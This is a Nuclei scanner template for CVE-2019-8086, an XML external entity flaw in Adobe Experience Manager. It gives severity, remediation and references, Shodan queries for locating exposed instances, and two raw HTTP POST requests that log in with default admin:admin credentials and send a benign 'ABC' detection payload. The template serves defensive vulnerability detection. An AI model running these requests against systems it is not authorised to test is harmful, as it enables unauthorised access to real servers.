id: CVE-2019-8086 info: name: Adobe Experience Manager - XML External Entity Injection author: DhiyaneshDk severity: high description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks. reference: - https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13 - https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086 - https://nvd.nist.gov/vuln/detail/CVE-2019-8086 - https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-8086 cwe-id: CWE-611 epss-score: 0.12383 epss-percentile: 0.94858 cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:* metadata: max-request: 2 vendor: adobe product: experience_manager shodan-query: - http.title:"AEM Sign In" - http.component:"Adobe Experience Manager" tags: cve,cve2019,aem,adobe http: - raw: - | POST /content/{{randstr}} HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic YWRtaW46YWRtaW4= Referer: {{BaseURL}} sling:resourceType=fd/af/components/guideContainer - | POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Authorization: Basic YWRtaW46YWRtaW4= Referer: {{BaseURL}} guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"\u0041\u0042\u0043"}}} matchers-condition: and matchers: - type: word part: body words: - 'ABC' - type: word part: header words: - application/json - type: status status: - 200 # digest: 490a004630440220478e1c1192e4069665ba16ca3c2b7591eb17d38516a489ef9c3a9b7fad63a670022068c796c431cb59f2ab223e297556c1b2dcdd5d84b9bab9adba1b5076fb57a9fa:922c64590222798bb761d5b6d8e72950